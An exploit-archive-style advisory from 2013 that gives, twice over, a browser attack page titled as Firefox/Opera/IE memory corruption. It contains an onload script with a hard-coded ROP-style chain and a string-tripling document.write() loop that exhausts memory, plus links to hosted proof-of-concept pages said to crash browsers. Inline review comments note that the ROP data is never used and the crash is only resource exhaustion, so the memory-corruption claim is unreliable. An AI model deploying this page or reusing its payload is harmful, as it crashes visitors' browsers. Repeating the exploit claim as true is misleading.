# Title : Mozilla Firefox 18.0.2/ Opera 12.12 / Iexplorer 9 Memory Corruption
# Date: 2013-02-18
# Software links:
http://www.mozilla.org
http://www.opera.com/
http://windows.microsoft.com/fr-CA/internet-explorer/
# Tested on: Windows XP SP2 & Puppy Linux & BackTrack 5
<html>
<head>
<title>Firefox 18.0.2 M3M0RY C0RRUPT!0N </title>
<body onload="javascript:hakim();">
<script language="JavaScript">
/**
 * Page onload handler: builds a string from %u-escaped 16-bit values, writes
 * it into the document, then repeatedly triples a second string and writes
 * every intermediate copy into the document as well.
 *
 * NOTE(review): the only browser API used here is document.write(). Nothing
 * visible on the page exercises a parser, plugin or object-lifetime bug that
 * could hand control to the `rop` data, so the "memory corruption" in the
 * title is not demonstrated by this code. The reported crash is consistent
 * with plain memory exhaustion from the loop at the end (a denial of
 * service); triage it as resource exhaustion unless a crash dump shows
 * otherwise.
 */
function hakim()
{
// Each unescape("%uXXXX%uYYYY") yields two UTF-16 code units; read as a
// little-endian pair they form one 32-bit value (%ubcf1%u1000 -> 0x1000bcf1).
// The 0x1000xxxx / 0x1001xxxx values are hard-coded; the page does not name
// the module or build they are meant to match.
// Detection note: long runs of unescape("%u....") concatenation are a
// well-known static signature for script-borne binary payloads.
var rop =unescape("%ubcf1%u1000");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0000%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%uea03%u1001");
rop+=unescape("%u6f51%u1000");
rop+=unescape("%ubfc1%u1000");
rop+=unescape("%u0060%u1002");
// 0x0c0c0c50: a value in the 0x0c0c.... range, which heap-spray heuristics
// commonly flag. No spray is performed anywhere in this function.
rop+=unescape("%u0c50%u0c0c");
rop+=unescape("%uee6a%u1000");
rop+=unescape("%udda4%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u1ab4%u1000");
rop+=unescape("%u58c3%u1000");
// %u4142 pairs ("BA" bytes) are filler between the hard-coded values.
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%uf986%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0070%u0041");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
// The next four lines decode to the UTF-16 text "xul.dll" plus a NUL.
// That is a Firefox-on-Windows library name, yet the page also lists Opera,
// Internet Explorer and two Linux distributions as tested targets.
rop+=unescape("%u0078%u0075");
rop+=unescape("%u006c%u002e");
rop+=unescape("%u0064%u006c");
rop+=unescape("%u006c%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u3374%u00a6");
rop+=unescape("%u8acf%u1001");
rop+=unescape("%u8dd1%u1000");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u3f14%u1001");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u62d5%u1001");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u9d12%u1001");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0001%u0000");
rop+=unescape("%u1000%u0000");
rop+=unescape("%u7e46%u1000");
rop+=unescape("%u0040%u0000");
rop+=unescape("%uaa6a%u1000");
rop+=unescape("%uaa03%u1001");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u58c3%u1000");
// The assembled string is emitted as ordinary document text; it is never
// referenced again after this call.
document.write(rop);
// Three-character seed: 'A', 'E', U+00F2.
var buffer = '\x41\x45\xF2'
// `i` is never declared, so in sloppy mode it becomes an implicit global.
// The loop asks for 1000 passes, but `buffer+=buffer+buffer` triples the
// string each time: 3 -> 9 -> 27 ... 3^(n+1) characters after n passes,
// which exceeds 3.4 billion characters by pass 19. The engine therefore runs
// out of memory (or hits its string-length cap) long before the loop ends,
// and document.write() of every intermediate copy adds further DOM growth.
// NOTE(review): per-process memory limits and string-length caps in current
// engines would typically turn this into an exception or a single-tab crash.
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer);
}
}
</script>
</head>
</body>
</html>
// Proof of concept
http://5.53.78ae.static.theplanet.com/~amodio/Sans%20titre.GIF
If you click on that link, your browser will crash.
http://5.53.78ae.static.theplanet.com/~amodio/dz.html
-----------
# Date: 2013-02-18
# Software links:
http://www.mozilla.org
http://www.opera.com/
http://windows.microsoft.com/fr-CA/internet-explorer/
# Tested on: Windows XP SP2 & Puppy Linux & BackTrack 5
<html>
<head>
<title>Firefox 18.0.2 M3M0RY C0RRUPT!0N </title>
<body onload="javascript:hakim();">
<script language="JavaScript">
/**
 * Page onload handler (second copy of the same listing): builds a string from
 * %u-escaped 16-bit values, writes it into the document, then repeatedly
 * triples a second string and writes every intermediate copy as well.
 *
 * NOTE(review): the only browser API used here is document.write(). Nothing
 * visible on the page exercises a parser, plugin or object-lifetime bug that
 * could hand control to the `rop` data, so the "memory corruption" in the
 * title is not demonstrated by this code. The reported crash is consistent
 * with plain memory exhaustion from the loop at the end (a denial of
 * service); triage it as resource exhaustion unless a crash dump shows
 * otherwise.
 */
function hakim()
{
// Each unescape("%uXXXX%uYYYY") yields two UTF-16 code units; read as a
// little-endian pair they form one 32-bit value (%ubcf1%u1000 -> 0x1000bcf1).
// The 0x1000xxxx / 0x1001xxxx values are hard-coded; the page does not name
// the module or build they are meant to match.
// Detection note: long runs of unescape("%u....") concatenation are a
// well-known static signature for script-borne binary payloads.
var rop =unescape("%ubcf1%u1000");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0000%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%uea03%u1001");
rop+=unescape("%u6f51%u1000");
rop+=unescape("%ubfc1%u1000");
rop+=unescape("%u0060%u1002");
// 0x0c0c0c50: a value in the 0x0c0c.... range, which heap-spray heuristics
// commonly flag. No spray is performed anywhere in this function.
rop+=unescape("%u0c50%u0c0c");
rop+=unescape("%uee6a%u1000");
rop+=unescape("%udda4%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u1ab4%u1000");
rop+=unescape("%u58c3%u1000");
// %u4142 pairs ("BA" bytes) are filler between the hard-coded values.
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%uf986%u1000");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u0070%u0041");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
rop+=unescape("%u4142%u4142");
// The next four lines decode to the UTF-16 text "xul.dll" plus a NUL.
// That is a Firefox-on-Windows library name, yet the page also lists Opera,
// Internet Explorer and two Linux distributions as tested targets.
rop+=unescape("%u0078%u0075");
rop+=unescape("%u006c%u002e");
rop+=unescape("%u0064%u006c");
rop+=unescape("%u006c%u0000");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u3374%u00a6");
rop+=unescape("%u8acf%u1001");
rop+=unescape("%u8dd1%u1000");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u3f14%u1001");
rop+=unescape("%ue0b8%u1000");
rop+=unescape("%u62d5%u1001");
rop+=unescape("%ucf2c%u1000");
rop+=unescape("%u9d12%u1001");
rop+=unescape("%uf5ef%u1000");
rop+=unescape("%u0001%u0000");
rop+=unescape("%u1000%u0000");
rop+=unescape("%u7e46%u1000");
rop+=unescape("%u0040%u0000");
rop+=unescape("%uaa6a%u1000");
rop+=unescape("%uaa03%u1001");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u4870%u1000");
rop+=unescape("%u58c3%u1000");
// The assembled string is emitted as ordinary document text; it is never
// referenced again after this call.
document.write(rop);
// Three-character seed: 'A', 'E', U+00F2.
var buffer = '\x41\x45\xF2'
// `i` is never declared, so in sloppy mode it becomes an implicit global.
// The loop asks for 1000 passes, but `buffer+=buffer+buffer` triples the
// string each time: 3 -> 9 -> 27 ... 3^(n+1) characters after n passes,
// which exceeds 3.4 billion characters by pass 19. The engine therefore runs
// out of memory (or hits its string-length cap) long before the loop ends,
// and document.write() of every intermediate copy adds further DOM growth.
// NOTE(review): per-process memory limits and string-length caps in current
// engines would typically turn this into an exception or a single-tab crash.
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer);
}
}
</script>
</head>
</body>
</html>
// Proof of concept
http://5.53.78ae.static.theplanet.com/~amodio/Sans%20titre.GIF
If you click on that link, your browser will crash.
http://5.53.78ae.static.theplanet.com/~amodio/dz.html
-----------